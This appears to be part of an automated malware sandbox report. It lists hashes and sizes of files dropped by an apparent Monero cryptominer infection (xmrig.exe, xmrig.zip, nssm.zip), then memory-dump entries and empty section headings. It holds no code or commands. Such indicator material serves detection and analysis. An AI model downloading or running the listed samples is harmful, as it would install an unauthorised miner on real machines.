eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1956-40-0x0000017534780000-0x0000017534792000-memory.dmp

Filesize
72KB

Download
memory/1956-39-0x00000175195C0000-0x00000175195CA000-memory.dmp

Filesize
40KB

Download
memory/2076-12-0x00007FF82DDE0000-0x00007FF82E8A1000-memory.dmp

Filesize
10.8MB

Download
memory/2076-0-0x00007FF82DDE3000-0x00007FF82DDE5000-memory.dmp

Filesize
8KB

Download
memory/2076-62-0x00007FF82DDE3000-0x00007FF82DDE5000-memory.dmp

Filesize
8KB

Download
memory/2076-11-0x00007FF82DDE0000-0x00007FF82E8A1000-memory.dmp

Filesize
10.8MB

Download
memory/2076-63-0x00007FF82DDE0000-0x00007FF82E8A1000-memory.dmp

Filesize
10.8MB

Download
memory/2076-10-0x00000202FEA80000-0x00000202FEAA2000-memory.dmp

Filesize
136KB

Download
memory/2076-201-0x00007FF82DDE0000-0x00007FF82E8A1000-memory.dmp

Filesize
10.8MB

Download
memory/2280-67-0x0000000001230000-0x0000000001250000-memory.dmp

Filesize
128KB

Download
memory/2280-68-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3968-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.